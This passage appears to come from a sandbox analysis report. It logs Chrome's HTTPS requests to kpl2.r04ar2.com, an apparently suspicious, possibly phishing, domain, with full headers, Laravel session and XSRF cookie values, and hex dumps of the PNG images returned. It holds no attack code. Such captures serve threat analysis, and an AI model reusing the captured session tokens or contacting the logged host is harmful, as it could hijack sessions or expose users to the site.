                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:12 UTC642INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:12 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Disposition: inline; filename="wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9QVdqLvo9uDiHfjwsBxmv9WqNqICn8FmnOyeQNv1rpQ5tT%2BSTR3UbU%2BEic0eK2FwrFEAfo9UlPX2Mh36G1OfIehrHtJ8WZHYEA%2F%2BlDl9PDzqyN4AA%2BrLD4uEIsM8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6562af2d0cf1-EWR
                                                          2024-08-27 22:11:12 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          71192.168.2.449868188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC1124OUTGET /opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:13 UTC652INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:12 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 727
                                                          Connection: close
                                                          Content-Disposition: inline; filename="opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MruxlCXr41fAPLOI3IQronVSZUgl9p6%2Fr8sKzblw7VxsTnnYxOEZVp0K6VEwCxnc1pdSCE6eVnW6prMD7k7oVigwQliaOwmCt80BZTbOPWU%2BorXjWNAs9xwAvVii8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f6563ddfb0caa-EWR
                                                          2024-08-27 22:11:13 UTC717INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                          Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                          2024-08-27 22:11:13 UTC10INData Raw: 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          72192.168.2.449870188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC1510OUTGET /ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:13 UTC649INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:13 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 49602
                                                          Connection: close
                                                          Content-Disposition: inline; filename="ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWrBXQFyn4k8eg%2FwiGB6BF1sNtEtnf0xuA7kFDtV72GcdGTVPJpX4HbdulllRBzO5xdOwYTa%2BNVUqQTGNaXVnuqWDjhme5WRBHIudz74Y5L%2Fuz5qbClWh9rAFRy39A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65641d8143a0-EWR
                                                          2024-08-27 22:11:13 UTC720INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                          Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa c3 24 e2 27 53 ad d6 6a 02 70 01 b0
                                                          Data Ascii: gG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$$'Sjp
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48 cd 4d 07 fe 45 7a e2 fc 59 e0 15 e0
                                                          Data Ascii: G` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:HMEzY
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4 a2 eb bb c0 e0 4c 63 a6 ea d8 01 78
                                                          Data Ascii: I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0Lcx
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91 ba cd 59 c4 5f 7f ed d6 f6 d9 47 45
                                                          Data Ascii: V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\Y_GE
                                                          2024-08-27 22:11:13 UTC807INData Raw: b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2 26 e3 e4 ad 94 c3 5b 89 bf 9e 5b ad
                                                          Data Ascii: !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u&[[
                                                          2024-08-27 22:11:13 UTC1369INData Raw: 09 d1 21 0a 36 17 f8 04 f0 ff a2 83 48 35 77 15 30 39 3a 44 0b 56 00 b6 89 0e 21 f5 63 18 70 1c 69 ab 94 e3 80 65 62 e3 a8 e4 96 05 be 4c 9a d8 3a 9c fa 6f 8b 27 49 ea 4e 1b 02 e7 00 e3 48 8d 8b 23 23 c3 48 92 24 49 92 aa a7 8e 2b 70 54 f5 09 6b bd d6 aa c0 4f a9 ff 93 bc 47 02 df 8f 0e 21 75 81 57 81 5f 47 87 68 d1 6e d1 01 a4 3e 7a 80 43 80 47 48 2b 6f 8c 88 8d a3 8a 59 13 b8 00 b8 1d 9b d3 24 49 f5 b5 0a a9 71 71 de 0a 54 cb 87 a6 91 24 49 92 24 55 c6 a2 1a 38 d6 07 d6 ea 64 90 4c 1e 00 ee 8b 0e a1 2c 7a 80 4b 49 4d 1c 75 f6 45 e0 bb d1 21 a4 2e 52 d5 26 bf aa ae 8a a5 fa d9 1c f8 23 69 c5 b3 d5 83 b3 a8 da de 08 dc 45 7a 4a d9 49 2d 49 52 5d 2d cf fc 46 8e e3 48 5b 8b 49 92 24 49 92 b4 48 8b 6a e0 a8 ea 44 d1 cf a3 03 28 9b 4f 01 7b 45 87 28 d8 e9 c0
                                                          Data Ascii: !6H5w09:DV!cpiebL:o'INH##H$I+pTkOG!uW_Ghn>zCGH+oY$IqqT$I$U8dL,zKIMuE!.R&#iEzJI-IR]-FH[I$IHjD(O{E(
                                                          2024-08-27 22:11:13 UTC1369INData Raw: a4 2d 82 96 8d 0e 22 49 52 07 7d 04 b8 09 18 1d 1d 44 92 24 49 92 94 47 df 06 8e 2a 4e 08 dd 17 1d 40 4d fb 3c b0 75 74 88 02 5c 0f 7c 21 3a 84 a4 a6 dd 07 cc 8d 0e d1 a4 2a de af 15 e3 10 e0 37 b8 2a 81 ba c7 ce c0 35 78 ce 4b 92 ba cb 1b 49 5b 43 ba da 9a 24 49 92 24 d5 40 d5 57 e0 b8 37 3a 80 9a b2 31 70 52 74 88 02 3c 09 7c 10 98 1d 1d 44 52 d3 5e 04 9e 88 0e d1 a4 95 81 15 a3 43 a8 f4 3e 05 fc 88 b4 f2 95 d4 4d 76 c1 95 38 24 49 dd 67 03 d2 96 79 db 46 07 91 24 49 92 24 b5 c7 15 38 d4 29 3d c0 05 c0 32 d1 41 32 9b 01 1c 08 3c 1f 1d 44 52 cb fe 1a 1d a0 05 55 bc 67 ab 73 8e 07 ce 63 c1 ef f3 a4 6e b2 33 70 25 30 38 3a 88 24 49 1d 34 9a b4 9d ca 1e d1 41 24 49 92 24 49 ad ab 72 03 c7 1c e0 ef d1 21 b4 d4 3e 08 ec 16 1d a2 00 9f 07 fe 37 3a 84 a4 b6 54
                                                          Data Ascii: -"IR}D$IG*N@M<ut\|!:*7*5xKI[C$I$@W7:1pRt<|DR^C>Mv8$IgyF$I$8)=2A2<DRUgscn3p%08:$I4A$I$Ir!>7:T
                                                          2024-08-27 22:11:13 UTC1369INData Raw: f6 e8 d3 80 ef f6 f7 c1 36 70 28 97 15 81 13 a3 43 64 34 1e f8 78 74 08 49 1d 55 b5 15 38 aa 78 ff 56 f3 96 07 7e 45 da 1b 4f c5 7b 19 b8 1f 18 d3 a8 87 80 71 c0 93 c0 cc cc ff d7 20 52 33 c7 06 a4 6f dc 37 01 36 6f bc 5d 87 d4 00 a2 e2 0d 02 7e 0c bc 9e d4 1d 2f 49 52 37 e9 05 2e 07 76 00 1e 09 ce 22 49 92 24 49 75 f1 22 70 09 f0 a9 c6 af 87 03 17 2f f4 77 2e 03 9e eb ef 83 07 92 9e 00 ac 9a 67 a3 03 e8 35 8e 07 46 46 87 c8 e8 63 a4 7d 87 24 75 8f aa 35 07 ae 1a 1d 40 1d 71 3e 69 82 5f c5 78 08 b8 13 b8 03 f8 53 e3 d7 73 3b f4 7f cf 04 9e 6e d4 ad 0b fd d9 30 60 3b d2 16 1f 6f 6a 54 9d be cf 2a 9b cd 48 8d c8 27 45 07 91 24 29 c0 08 d2 0a a4 3b d0 cf d2 bd 92 24 49 92 a4 96 9c 03 7c 02 18 d0 f8 f5 b0 3e 7f 36 07 38 7b 51 1f 38 90 f4 83 5a 95 cc c5 06 8e
                                                          Data Ascii: 6p(Cd4xtIU8xV~EO{q R3o76o]~/IR7.v"I$Iu"p/w.g5FFc}$u5@q>i_xSs;n0`;ojT*H'E$);$I|>68{Q8Z
                                                          2024-08-27 22:11:13 UTC1211INData Raw: f5 16 3f 71 e5 73 20 f1 e7 41 ae 3a 39 f3 d8 a8 de f6 04 1e a1 98 73 71 2c ae c2 51 06 33 88 ff ba d4 4c 7d a2 98 61 50 87 0d 00 fe 4c fc f9 54 f6 ba 0d d8 a6 c5 31 d6 82 86 01 a7 90 56 2e 89 3e ae 65 ae bb 49 3f b4 49 2a a7 b1 c4 7f 9d 28 a2 8e c9 39 48 fa 3f 6b 02 e7 53 bd ef f7 a3 6b 02 30 aa 85 f1 96 24 95 cf 10 e2 ef 2b b9 6b bd ac 23 24 bd d6 65 c4 9f e7 39 eb d8 bc c3 23 a9 28 bd 54 6f f9 75 57 e0 88 35 00 f8 6a 74 88 4c 1e 03 fe 3b 3a 84 2a 61 15 e0 c7 a4 a7 70 37 2c e8 ff 58 17 38 ac a0 7f 5b 4b af 6a f7 98 65 a3 03 28 8b 0f 93 56 46 50 ff a6 00 47 02 bb 00 f7 05 67 a9 8b 57 49 0d 1c db 01 f7 c4 46 29 b5 6d 49 4b f0 4b 92 aa ef 29 e0 93 c0 26 c0 a5 c0 9c d8 38 95 31 0a f8 46 74 08 49 92 24 49 ea 26 bd c0 c0 e8 10 4d aa e2 12 f7 75 72 10 b0 59 74
                                                          Data Ascii: ?qs A:9sq,Q3L}aPLT1V.>eI?I*(9H?kSk0$+k#$e9#(TouW5jtL;:*ap7,X8[Kje(VFPGgWIF)mIKK)&81FtI$I&MurYt


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          73192.168.2.449869188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:12 UTC1124OUTGET /yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:13 UTC671INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:13 GMT
                                                          Content-Type: image/svg+xml
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Disposition: inline; filename="yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173"
                                                          CF-Cache-Status: DYNAMIC
